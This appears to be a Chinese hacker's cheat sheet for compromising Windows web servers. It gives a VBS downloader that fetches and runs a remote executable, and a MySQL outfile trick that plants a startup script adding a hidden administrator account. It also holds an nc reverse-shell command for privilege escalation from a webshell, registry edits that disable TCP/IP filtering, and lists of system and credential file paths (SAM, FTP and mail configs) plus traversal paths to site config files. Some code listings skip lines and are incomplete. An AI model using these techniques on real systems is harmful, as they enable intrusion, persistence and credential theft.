vbs 下载者:
03 | echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs |
05 | echo sGet.Mode = 3 >>c:\windows\cftmon.vbs |
07 | echo sGet.Type = 1 >>c:\windows\cftmon.vbs |
09 | echo sGet.Open() >>c:\windows\cftmon.vbs |
11 | echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs |
13 | echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs |
15 | echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs |
17 | echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs |
2:
01 | On Error Resume Next:Dim iRemote,iLocal,s1,s2 |
03 | iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0)) |
05 | s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream" |
07 | Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send() |
09 | Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open() |
11 | sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2 |
14 | create table a (cmd text): |
1 | insert into a values ("set wshshell=createobject (""wscript.shell"")"); |
3 | insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)"); |
5 | insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)"); |
7 | select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs"; |
Cmd 下目录的操作技巧:
列出d的所有目录:
1 | for /d %i in (d:\freehost\*) do @echo %i |
把当前路径下文件夹的名字只有1-3个字母的显示出来:
1 | for /d %i in (???) do @echo %i |
以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:
1 | for /r %i in (*.exe) do @echo %i |
以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出:
1 | for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i |
这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中:
1 | for /f %i in (c:\1.txt) do echo %i |
delims=后的空格是分隔符,tokens是取第几个位置:
1 | for /f "tokens=2 delims= " %i in (a.txt) do echo %i |
Windows 系统下的一些常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘):
009 | c:\CMailServer\config.ini |
011 | c:\CMailServer\CMailServer.exe |
013 | c:\CMailServer\WebMail\index.asp |
015 | c:\program files\CMailServer\CMailServer.exe |
017 | c:\program files\CMailServer\WebMail\index.asp |
019 | C:\WinWebMail\SysInfo.ini |
021 | C:\WinWebMail\Web\default.asp |
023 | C:\WINDOWS\FreeHost32.dll |
025 | C:\WINDOWS\7i24iislog4.exe |
027 | C:\WINDOWS\7i24tool.exe |
029 | c:\hzhost\databases\url.asp |
031 | c:\hzhost\hzclient.exe |
033 | C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk |
035 | C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk |
067 | c:\WWWROOT\default.html |
069 | c:\website\default.html |
075 | c:\wwwsite\default.asp |
077 | c:\WWWROOT\default.asp |
083 | c:\WWWROOT\default.php |
085 | c:\WWWsite\default.php |
087 | C:\Inetpub\wwwroot\pagerror.gif |
089 | c:\windows\notepad.exe |
093 | C:\Program Files\Microsoft Office\OFFICE10\winword.exe |
095 | C:\Program Files\Microsoft Office\OFFICE11\winword.exe |
097 | C:\Program Files\Microsoft Office\OFFICE12\winword.exe |
099 | C:\Program Files\Internet Explorer\IEXPLORE.EXE |
101 | C:\Program Files\winrar\rar.exe |
103 | C:\Program Files\360\360Safe\360safe.exe |
105 | C:\Program Files\360Safe\360safe.exe |
107 | C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log |
113 | C:\Program Files\Rising\Rav\RsTask.xml |
115 | C:\Documents and Settings\All Users\Start Menu\desktop.ini |
117 | C:\Documents and Settings\Administrator\My Documents\Default.rdp |
119 | C:\Documents and Settings\Administrator\Cookies\index.dat |
121 | C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt |
123 | C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt |
125 | C:\Documents and Settings\Administrator\My Documents\1.txt |
127 | C:\Documents and Settings\Administrator\桌面\1.txt |
129 | C:\Documents and Settings\Administrator\My Documents\a.txt |
131 | C:\Documents and Settings\Administrator\桌面\a.txt |
133 | C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg |
135 | E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm |
137 | C:\Program Files\RhinoSoft.com\Serv-U\Version.txt |
139 | C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini |
141 | C:\Program Files\Symantec\SYMEVENT.INF |
143 | C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe |
145 | C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf |
147 | C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf |
149 | C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf |
151 | C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm |
153 | C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT |
155 | C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll |
157 | C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini |
159 | C:\MySQL\MySQL Server 5.0\my.ini |
161 | C:\Program Files\MySQL\MySQL Server 5.0\my.ini |
163 | C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm |
165 | C:\Program Files\MySQL\MySQL Server 5.0\COPYING |
167 | C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql |
169 | C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe |
171 | c:\MySQL\MySQL Server 4.1\bin\mysql.exe |
173 | c:\MySQL\MySQL Server 4.1\data\mysql\user.frm |
175 | C:\Program Files\Oracle\oraconfig\Lpk.dll |
177 | C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe |
179 | C:\WINDOWS\system32\inetsrv\w3wp.exe |
181 | C:\WINDOWS\system32\inetsrv\inetinfo.exe |
183 | C:\WINDOWS\system32\inetsrv\MetaBase.xml |
185 | C:\WINDOWS\system32\inetsrv\iisa, dmpwd\achg.asp |
187 | C:\WINDOWS\system32\config\default.LOG |
189 | C:\WINDOWS\system32\config\sam |
191 | C:\WINDOWS\system32\config\system |
193 | c:\CMailServer\config.ini |
195 | c:\program files\CMailServer\config.ini |
197 | c:\tomcat6\tomcat6\bin\version.sh |
199 | c:\tomcat6\bin\version.sh |
201 | c:\tomcat\bin\version.sh |
203 | c:\program files\tomcat6\bin\version.sh |
205 | C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh |
207 | c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log |
209 | c:\Apache2\Apache2\bin\Apache.exe |
211 | c:\Apache2\bin\Apache.exe |
213 | c:\Apache2\php\license.txt |
215 | C:\Program Files\Apache Group\Apache2\bin\Apache.exe |
217 | c:\Program Files\QQ2007\qq.exe |
219 | c:\Program Files\Tencent\, qq\User.db |
221 | c:\Program Files\Tencent\qq\qq.exe |
223 | c:\Program Files\Tencent\qq\bin\qq.exe |
225 | c:\Program Files\Tencent\qq2009\qq.exe |
227 | c:\Program Files\Tencent\qq2008\qq.exe |
229 | c:\Program Files\Tencent\qq2010\bin\qq.exe |
231 | c:\Program Files\Tencent\qq\Users\All Users\Registry.db |
233 | C:\Program Files\Tencent\TM\TMDlls\QQZip.dll |
235 | c:\Program Files\Tencent\Tm\Bin\Txplatform.exe |
237 | c:\Program Files\Tencent\RTXServer\AppConfig.xml |
239 | C:\Program Files\Foxmal\Foxmail.exe |
241 | C:\Program Files\Foxmal\accounts.cfg |
243 | C:\Program Files\tencent\Foxmal\Foxmail.exe |
245 | C:\Program Files\tencent\Foxmal\accounts.cfg |
247 | C:\Program Files\LeapFTP 3.0\LeapFTP.exe |
249 | C:\Program Files\LeapFTP\LeapFTP.exe |
251 | c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe |
253 | c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt |
255 | C:\Program Files\FlashFXP\FlashFXP.ini |
257 | C:\Program Files\FlashFXP\flashfxp.exe |
259 | c:\Program Files\Oracle\bin\regsvr32.exe |
261 | c:\Program Files\腾讯游戏\QQGAME\readme.txt |
263 | c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt |
265 | c:\Program Files\tencent\QQGAME\readme.txt |
267 | C:\Program Files\StormII\Storm.exe |
各种网站的配置文件相对路径大全:
017 | ../../../config.inc.php |
047 | ../../../config.inc.php |
051 | ../../config/config.php |
055 | ../../../config/config.php |
057 | /config/config.inc.php |
059 | ./config/config.inc.php |
061 | ../../config/config.inc.php |
063 | ../config/config.inc.php |
065 | ../../../config/config.inc.php |
075 | ../../../config/conn.php |
085 | ../../../config/conn.asp |
087 | /config/config.inc.php |
089 | ./config/config.inc.php |
091 | ../../config/config.inc.php |
093 | ../config/config.inc.php |
095 | ../../../config/config.inc.php |
103 | ../../../data/config.php |
109 | ../../data/config.inc.php |
111 | ../data/config.inc.php |
113 | ../../../data/config.inc.php |
123 | ../../../data/conn.php |
133 | ../../../data/conn.asp |
139 | ../../data/config.inc.php |
141 | ../data/config.inc.php |
143 | ../../../data/config.inc.php |
147 | ../../include/config.php |
151 | ../../../include/config.php |
153 | /include/config.inc.php |
155 | ./include/config.inc.php |
157 | ../../include/config.inc.php |
159 | ../include/config.inc.php |
161 | ../../../include/config.inc.php |
167 | ../../include/conn.php |
171 | ../../../include/conn.php |
177 | ../../include/conn.asp |
181 | ../../../include/conn.asp |
183 | /include/config.inc.php |
185 | ./include/config.inc.php |
187 | ../../include/config.inc.php |
189 | ../include/config.inc.php |
191 | ../../../include/config.inc.php |
199 | ../../../inc/config.php |
205 | ../../inc/config.inc.php |
209 | ../../../inc/config.inc.php |
235 | ../../inc/config.inc.php |
239 | ../../../inc/config.inc.php |
去除TCP IP筛选:
TCP/IP筛选在注册表里有三处,分别是:
1 | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip |
3 | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip |
5 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip |
分别用以下命令来导出注册表项:
1 | regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip |
3 | regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip |
5 | regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip |
然后再把三个文件里的:
1 | “EnableSecurityFilters"=dword:00000001” |
改为:
1 | “EnableSecurityFilters"=dword:00000000” |
再将以上三个文件分别用以下命令导入注册表即可:
Webshell 提权小技巧:
Cmd路径:
Nc 也在同目录下,例如反弹cmdshell:
1 | "c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe" |
通常都不会成功。
而直接在 cmd 路径上输入:
命令输入:
却能成功。。这个不是重点
我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。
命令行调用 RAR 打包:
1 | rar a -k -r -s -m3 c:\1.rar c:\folde |